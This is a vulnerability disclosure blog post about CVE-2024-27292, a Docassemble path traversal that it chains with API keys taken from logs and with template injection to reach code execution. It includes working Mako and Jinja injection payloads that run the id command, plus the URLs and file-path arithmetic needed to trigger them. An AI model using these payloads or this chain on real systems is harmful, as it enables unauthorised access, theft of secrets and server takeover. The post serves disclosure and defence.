This post examines CVE-2024-27292 in Docassemble, revealing an unauthenticated path traversal flaw that exposes sensitive files and secrets, leading to privilege escalation and template injection, enabling remote code execution. It details the vulnerability, its impact, and the exploitation steps.
Background
“Docassemble is a free, open-source expert system for guided interviews and document assembly. It provides a web site that conducts interviews with users. Based on the information gathered, the interviews can present users with documents in PDF, RTF, or DOCX format, which users can download or e-mail.” - https://docassemble.org/
I was introduced to Docassemble about a year ago while working on a project to automate some business development processes. Although I specialise in hacking, I also enjoy building things from time to time. I learned a lot about Docassemble when building this automation process, during which many functionalities had my hacker senses tingling. In March 2024, I decided to utilise my research time at TantoSec to take a closer look at Docassemble from a hacker’s perspective.
If you wish to follow along with this post or look at the application in your own time, it is very easy to spin up using Docker. I used the Docassemble Docker image version 1.4.96 for this research project and deployed the application locally. Since the Docassemble developer only provides the “latest” tagged image on DockerHub, you will need to use git to download version 1.4.96 and build the older version of the image locally:
git clone https://github.com/jhpyle/docassemble
cd docassemble
git checkout v1.4.96
docker build -t yourname/mydocassemble .
cd ..
docker run -d -p 80:80 -p 443:443 --restart always --stop-timeout 600 yourname/mydocassemble
Initial Code Review
Docassemble is written in Python and is built using three main packages:
Since the codebase is massive, I decided to look at unauthenticated routes that the application implements. This led me to discover the /interview route, which is used by the application to display the default home page when the application is deployed:
This caught my eye immediately because the data/questions/default-interview... value in the /?i= parameter of the URL seems like a file path. If it is in fact a file path, this could potentially be a vector for a file path traversal vulnerability! So I went digging, trying to understand how the application handles the value supplied to this URL parameter.
The implementation of this path can be found at docassemble/webapp/server.py on line 6666:
@app.route(index_path, methods=['POST', 'GET'])
def index(action_argument=None, refer=None):
    # if refer is None and request.method == 'GET':
    #     setup_translation()
    is_ajax = bool(request.method == 'POST' and 'ajax' in request.form and int(request.form['ajax']))
    docassemble.base.functions.this_thread.misc['call'] = refer
    return_fake_html = False
The app route is for the index_path variable, which is /interview in the default installation of Docassemble. This is determined by the block of code in docassemble/webapp/server.py on line 6638:
if COOKIELESS_SESSIONS:
    index_path = '/i'
    html_index_path = '/interview'
else:
    index_path = '/interview'
    html_index_path = '/i'
Here, the value of index_path depends on COOKIELESS_SESSIONS. The COOKIELESS_SESSIONS variable is read from the cookieless sessions setting in the Docassemble configuration file found in docassemble/config/config.yml, and defaults to False when that setting is absent, as per the code block in docassemble/webapp/server.py on line 175:
COOKIELESS_SESSIONS = daconfig.get('cookieless sessions', False)
This setting does not exist in a default installation of Docassemble, so index_path is /interview, which is the route we are interested in.
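As a rough illustration of the selection logic above, the sketch below reproduces it as a standalone function. `route_paths` is a hypothetical helper that does not exist in Docassemble, and `daconfig` is modelled here as a plain dictionary.

```python
def route_paths(daconfig):
    """Return (index_path, html_index_path) following the server.py snippets above.

    `daconfig` is assumed to behave like a dict of parsed configuration values.
    """
    cookieless = daconfig.get('cookieless sessions', False)
    if cookieless:
        return '/i', '/interview'
    return '/interview', '/i'


# Default installation: the setting is absent, so the interview lives at /interview.
print(route_paths({}))
# With the setting enabled, the two paths swap.
print(route_paths({'cookieless sessions': True}))
```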
Now our next step is to look at where the value passed to the i URL argument in the /interview path is being processed. This takes us to line 6733 in docassemble/webapp/server.py:
@app.route(index_path, methods=['POST', 'GET'])
def index(action_argument=None, refer=None):
    <-- Snipped -->
    if 'i' not in request.args and 'state' in request.args:
        try:
            yaml_filename = re.sub(r'\^.*', '', from_safeid(request.args['state']))
        except:
            yaml_filename = guess_yaml_filename()
    else:
        yaml_filename = request.args.get('i', guess_yaml_filename())
    <-- Snipped -->
We can see in the code above that the /interview route accepts state and not just i as the URL argument. So what is happening here? What can we do with either of these arguments? It seems that no matter which parameter is used, it is used to decide the value of yaml_filename.
If state is used, the code enters the if block and passes its value to the from_safeid function, the decoding counterpart of safeid:
def safeid(text):
    return re.sub(r'[\n=]', '', codecs.encode(text.encode('utf-8'), 'base64').decode())
safeid base64-encodes a UTF-8 string and strips newlines and = padding. from_safeid does the reverse: it takes a base64 encoded string and returns the original UTF-8 string (anything from the first ^ onwards is then discarded by the re.sub call). We can conclude that the state argument takes in a base64 encoded string and sets yaml_filename to its base64 decoded UTF-8 value.
On the other hand, if i is used, the code enters the else block and simply assigns its value to yaml_filename.
We have now established that we can either pass a base64 encoded value to state or a UTF-8 value to i to control yaml_filename. But what is the application doing with yaml_filename?
On line 6794 of docassemble/webapp/server.py, the application passes yaml_filename to the get_interview() function:
interview = docassemble.base.interview_cache.get_interview(yaml_filename)
get_interview() can be found in docassemble/base/interview_cache.py on line 7:
def get_interview(path):
    if path is None:
        raise DAException("Tried to load interview source with no path")
    if cache_valid(path):
        the_interview = cache[path]['interview']
        the_interview.from_cache = True
    else:
        interview_source = docassemble.base.parse.interview_source_from_string(path)
        interview_source.update()
        the_interview = interview_source.get_interview()
        the_interview.from_cache = False
        cache[interview_source.path] = {'index': interview_source.get_index(), 'interview': the_interview, 'source': interview_source}
    return the_interview
This function checks whether the interview for the given file path is already stored in its cache, using the cache_valid function. If it is, the cached interview is returned; otherwise, the file path is passed to the interview_source_from_string() function in docassemble/base/parse.py:
def interview_source_from_string(path, **kwargs):
    if path is None:
        raise DAError("Passed None to interview_source_from_string")
    # logmessage("Trying to find " + path)
    path = re.sub(r'(docassemble.playground[0-9]+[^:]*:)data/questions/(.*)', r'\1\2', path)
    for the_filename in question_path_options(path):
        if the_filename is not None:
            new_source = InterviewSourceFile(filepath=the_filename, path=path)
            if new_source.update(**kwargs):
                return new_source
    raise DANotFoundError("Interview " + str(path) + " not found")
The above function normalises the supplied path, asks question_path_options() for candidate file locations, and returns the first candidate that can be read, so that only an absolute file path remains. For example, if we recall from the beginning of this post, in a default installation of Docassemble, the default interview is shown by the application at the following URL:
http://localhost/interview?i=docassemble.base:data/questions/default-interview.yml#page1
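The only rewriting visible in interview_source_from_string itself is the re.sub call on its first working line. The sketch below isolates that one step to show which inputs it changes. `normalise_playground_path` is a hypothetical wrapper name, and question_path_options, which is not shown in this post, is deliberately not reproduced.

```python
import re


def normalise_playground_path(path):
    # Same substitution as in interview_source_from_string: for playground
    # packages, drop the "data/questions/" prefix after the package name.
    return re.sub(r'(docassemble.playground[0-9]+[^:]*:)data/questions/(.*)', r'\1\2', path)


for candidate in (
    'docassemble.playground1:data/questions/test.yml',
    'docassemble.base:data/questions/default-interview.yml',
    '/etc/passwd',
):
    print(candidate, '->', normalise_playground_path(candidate))
```

Under this reading, only playground-style values are rewritten; a plain absolute path such as /etc/passwd passes through this step unchanged.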
The interview_source_from_string function picks out the data/questions/default-interview.yml part of the value of i and resolves it to an absolute file path. The resulting interview source is returned to the get_interview function, which calls the update() function in /docassemble/base/parse.py on line 378:
def update(self, **kwargs):
    try:
        with open(self.filepath, 'r', encoding='utf-8') as the_file:
            orig_text = the_file.read()
    except:
        return False
    if not orig_text.startswith('# use jinja'):
        self.set_content(orig_text)
        return True
    env = Environment(
        loader=DAFileSystemLoader(self.directory),
        autoescape=select_autoescape()
    )
    template = env.get_template(os.path.basename(self.filepath))
    data = copy.deepcopy(get_config('jinja data'))
    data['__version__'] = da_version
    data['__architecture__'] = da_arch
    data['__filename__'] = self.path
    data['__current_package__'] = self.package
    data['__parent_filename__'] = kwargs.get('parent_source', self).path
    data['__parent_package__'] = kwargs.get('parent_source', self).package
    data['__interview_filename__'] = kwargs.get('interview_source', self).path
    data['__interview_package__'] = kwargs.get('interview_source', self).package
    data['__hostname__'] = get_config('external hostname', None) or 'localhost'
    data['__debug__'] = bool(get_config('debug', True))
    try:
        self.set_content(template.render(data))
    except Exception as err:
        self.set_content("__error__: " + repr("Jinja2 rendering error: " + err.__class__.__name__ + ": " + str(err)))
    return True
This function opens the file path that we have passed and simply loads the contents of the file as the interview source, with no validation of the path visible in this code, resulting in a path traversal vulnerability. There is another vulnerability here for the keen-eyed, but more on that later 👀
CVE-2024-27292 - Unauthenticated Path Traversal
Using our analysis up to this point, we can verify that the application is vulnerable to File Path Traversal by simply navigating to http://localhost/interview?i=/etc/passwd.
We can also exploit the same vulnerability using the state argument, where the value passed to it is the base64 encoded string “/etc/passwd”:
I reported this vulnerability to Docassemble, and it was assigned CVE-2024-27292.
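For reference, the two request forms described above can be built as in the following sketch. `probe_urls` is a hypothetical helper, and `http://localhost` assumes the local Docker deployment described earlier in this post. The state value is produced the same way safeid does it: base64 with the = padding stripped.

```python
import base64
from urllib.parse import urlencode


def probe_urls(base_url, target_path):
    """Return the (i, state) variants of the /interview URL for target_path."""
    # Variant 1: the path is passed as-is in the i argument.
    i_url = base_url + '/interview?' + urlencode({'i': target_path}, safe='/')
    # Variant 2: the path is base64-encoded, without padding, in the state argument.
    encoded = base64.b64encode(target_path.encode('utf-8')).decode().rstrip('=')
    state_url = base_url + '/interview?' + urlencode({'state': encoded}, safe='/')
    return i_url, state_url


for url in probe_urls('http://localhost', '/etc/passwd'):
    print(url)
```

Only run requests like these against an instance you own or are authorised to test.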
Using the path traversal vulnerability, we can also read the Docassemble configuration file from the Docassemble server.
This file contains sensitive hardcoded secrets that can allow attackers access to secret keys for various items that may be configured in the affected Docassemble instance. The most sensitive ones are keys for:
- OAuth
- Github
- AWS S3
- Flask Secret Key
This may result in a complete compromise of the Docassemble instance. However, this can only be exploited in cases where these services are configured to be used by Docassemble.
Escalating the Path Traversal Vulnerability
Path traversal is nice, but I wanted to find a way to escalate this. This led me to discover that Docassemble has its own Application Programming Interface (API). Users with the Administrator or Developer privilege can interact with this API. Docassemble uses API keys to authenticate users, and a key can be passed as a URL parameter or in headers such as Authorization or X-API-KEY. In a scenario like the following, where the API key is used within the URL, CVE-2024-27292 can be used to extract the keys from Docassemble log files:
curl http://localhost/api/list?key=H3PLMKJKIVATLDPWHJH3AGWEJPFU5GRT
If the API key does not have any restrictions, such as a whitelist of IPs allowed to use it, it can be used to gain a valid session as the user the extracted API key belongs to. For example, an API key can be extracted from the /usr/share/docassemble/log/access.log log file using the following URL:
This API key can then be used to get a session cookie by simply sending a GET request to any valid API endpoint such as http://localhost/api/list?key=NQEp6xD54OdGNF8Sc3tKlPZmIPLzs7W2.
This session cookie can then be used to access the application with the privilege of the user the extracted API key belongs to. In this example, an administrator’s API key was used.
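Once the access log has been read through the path traversal, pulling the keys out of it is a simple pattern match. The sketch below is one way to do that under stated assumptions: `extract_api_keys` is a hypothetical helper, and the sample log lines are made up in a generic access-log shape purely for illustration; they are not copied from a Docassemble server.

```python
import re

# Matches key=<value> when it appears as a URL query parameter.
KEY_PATTERN = re.compile(r'[?&]key=([A-Za-z0-9]+)')


def extract_api_keys(log_text):
    """Return the distinct key= values found in log_text, in order of first appearance."""
    found = []
    for match in KEY_PATTERN.finditer(log_text):
        key = match.group(1)
        if key not in found:
            found.append(key)
    return found


# Illustrative, invented log content (assumption: requests are logged with their query string).
sample_log = (
    '127.0.0.1 - - "GET /api/list?key=H3PLMKJKIVATLDPWHJH3AGWEJPFU5GRT HTTP/1.1" 200\n'
    '127.0.0.1 - - "GET /interview?i=docassemble.base:data/questions/default-interview.yml HTTP/1.1" 200\n'
    '127.0.0.1 - - "GET /api/list?key=H3PLMKJKIVATLDPWHJH3AGWEJPFU5GRT HTTP/1.1" 200\n'
)

print(extract_api_keys(sample_log))
```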
Yay! So now we have a vector to gain a valid session as a user with higher privilege if the stars align. This gives us access to a wider range of functionalities in comparison to an unauthenticated user increasing the attack surface of the application.
Code Execution using a Privileged Account
Once an attacker compromises a privileged account such as an Administrator or a Developer account, there are a number of ways to get code execution on the application server. This can be achieved by installing arbitrary Python packages, writing Python modules, or using Python code blocks in Docassemble YAML interview files. Another such insecure feature is the use of Mako templates to create an interview. Hacktricks has a ready-to-use payload for Mako template injection to gain code execution on the server. We can use that same payload in this sample YAML interview file in the Docassemble Playground to execute code with a Developer or Administrator account:
mandatory: True
question: |
  RCE
subquestion: |
  <%
  import os
  command = 'id'
  x=os.popen(command).read()
  %>
  ${x}
In the following URL, use the above-mentioned payload and click “Save and Run” to execute the id command on the server:
The following page is then loaded with the output of the command:
This Server-Side Template Injection was reported to Docassemble but it was not accepted as a valid vulnerability. The developer emphasised that Docassemble was built to give interview developers the full power of a general-purpose programming language and that an administrator would not grant developer user role to an untrusted user.
We have successfully gained code execution on the server from an unauthenticated attacker’s perspective by chaining different vulnerabilities. However, this chain relies heavily on the compromise of API keys to gain a valid privileged session. So I wanted to find a different path that could give us the same result without relying on the API keys.
Path Traversal to Server Side Template Injection
Going back to the Path Traversal vulnerability where we looked at the update() function, I mentioned that there is another vulnerability. This is the same function that reads the file from the file path supplied to the vulnerable URL parameter. Let’s look at the code again and see what it is:
def update(self, **kwargs):
    try:
        with open(self.filepath, 'r', encoding='utf-8') as the_file:
            orig_text = the_file.read()
    except:
        return False
    if not orig_text.startswith('# use jinja'):
        self.set_content(orig_text)
        return True
    env = Environment(
        loader=DAFileSystemLoader(self.directory),
        autoescape=select_autoescape()
    )
    template = env.get_template(os.path.basename(self.filepath))
    data = copy.deepcopy(get_config('jinja data'))
    data['__version__'] = da_version
    data['__architecture__'] = da_arch
    data['__filename__'] = self.path
    data['__current_package__'] = self.package
    data['__parent_filename__'] = kwargs.get('parent_source', self).path
    data['__parent_package__'] = kwargs.get('parent_source', self).package
    data['__interview_filename__'] = kwargs.get('interview_source', self).path
    data['__interview_package__'] = kwargs.get('interview_source', self).package
    data['__hostname__'] = get_config('external hostname', None) or 'localhost'
    data['__debug__'] = bool(get_config('debug', True))
    try:
        self.set_content(template.render(data))
    except Exception as err:
        self.set_content("__error__: " + repr("Jinja2 rendering error: " + err.__class__.__name__ + ": " + str(err)))
    return True
We can see in the code that the if not block checks whether the contents of the file at the supplied file path start with # use jinja. If they do, the function treats the file as a Jinja template and simply renders it! So if I upload a file and control the content, then use the path traversal vulnerability to access the file, I should have code execution. This seems promising because a common theme in Docassemble interviews is to allow users to upload a file.
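The branch that decides between "return the text as-is" and "render it as a template" comes down to one startswith check. The sketch below isolates that decision; `would_render_as_jinja` is a hypothetical helper that mirrors the condition in update() and does no rendering itself.

```python
JINJA_MARKER = '# use jinja'


def would_render_as_jinja(file_text):
    """Mirror the check in update(): only files that begin with the marker are rendered."""
    return file_text.startswith(JINJA_MARKER)


print(would_render_as_jinja('# use jinja\n{{ 7 * 7 }}'))   # True
print(would_render_as_jinja('root:x:0:0:root:/root:/bin/bash'))  # False
print(would_render_as_jinja('#use jinja\n{{ 7 * 7 }}'))    # False: the space after # matters
```

The check is an exact prefix match, so the marker has to be the very first bytes of the file, including the space after the # character.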
Let’s test this out by creating a Docassemble interview with file upload using the following YAML file in Docassemble playground with a Developer user’s account:
---
question: |
  Please upload a picture of yourself.
fields:
  - Picture: user_picture
    datatype: file
---
question: |
  You're so adorable, François!
subquestion: |
  ${ user_picture }
mandatory: True
This YAML template is taken directly from Docassemble’s example for a file upload. This results in the following file upload:
Using this file upload, let’s upload a file RCE.payload with the following content:
# use jinja
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
The uploaded file can be accessed with the following URL in this case:
In a default installation of Docassemble, the number after /uploadedfile/ in the URL of the uploaded file, which in this case is 8, refers to the absolute file path /usr/share/docassemble/files/000/000/000/008/file.payload on the web server. The directory components of this path are the hexadecimal representation of 8, zero-padded and split into groups of three digits. By this logic, if a file can be accessed using the path /uploadedfile/11/file.payload, the corresponding absolute file path on the server would be /usr/share/docassemble/files/000/000/000/00b/file.payload. Using this logic, we can identify the exact path of the uploaded file on the web server, which we can use in our path traversal vulnerability.
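The mapping from file number to on-disk path can be sketched as follows. This is inferred only from the two examples above (8 and 11), so the 12-digit width and the grouping into threes are assumptions; `upload_path` is a hypothetical helper, and the root directory and file.payload name are taken from the example paths in this post.

```python
def upload_path(file_number, filename='file.payload', root='/usr/share/docassemble/files'):
    """Guess the absolute path of an uploaded file from its numeric ID.

    Assumption: the ID is written as 12 zero-padded hex digits, split into
    four directory names of three digits each.
    """
    hex_digits = format(file_number, '012x')
    parts = [hex_digits[i:i + 3] for i in range(0, 12, 3)]
    return '/'.join([root, *parts, filename])


print(upload_path(8))   # /usr/share/docassemble/files/000/000/000/008/file.payload
print(upload_path(11))  # /usr/share/docassemble/files/000/000/000/00b/file.payload
```

The resulting path is what gets supplied as the value of the i argument to the /interview route.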
Since we uploaded the RCE.payload file with # use jinja as the first line, let’s see if we can use CVE-2024-27292 to render the injected Jinja SSTI payload by navigating to the following URL:
Great Success! Very Nice!
Patch
CVE-2024-27292 has been patched in Docassemble version 1.4.97 and above.
Timeline
29/02/2024 - Reported path traversal to Docassemble
01/03/2024 - CVE-2024-27292 assigned and patched by developer
08/04/2024 - Reported server-side template injection (SSTI) to Docassemble
08/04/2024 - Developer response on SSTI as not valid
Conclusion
The Mako Server-Side Template Injection using a compromised privileged account was reported to Docassemble but it was not accepted as a valid vulnerability. The developer emphasised that Docassemble was built to give interview developers the full power of a general-purpose programming language and that an administrator would not grant developer user role to an untrusted user.
Docassemble was initially created to automate different processes in practicing law. However, different organisations use it for purposes such as automation, storage of user input, and application submissions. There were over 570 instances of Docassemble identified via Zoomeye.com with many of these instances still using Docassemble versions vulnerable to CVE-2024-27292. It is strongly recommended to update Docassemble to the latest version to prevent any unauthorised access to sensitive information.
It is also important to note that Docassemble should be deployed with comprehensive consideration of security best practices. Refer to the documentation available at Docassemble Security Best Practices. These guidelines can assist in ensuring a more secure deployment environment and help safeguard against potential vulnerabilities.
About the Author
Riyush Ghimire is a Security Consultant at Tanto Security, passionate about application security. He hopes to grow in the field and share his insights and findings through research. You can connect with Riyush on LinkedIn.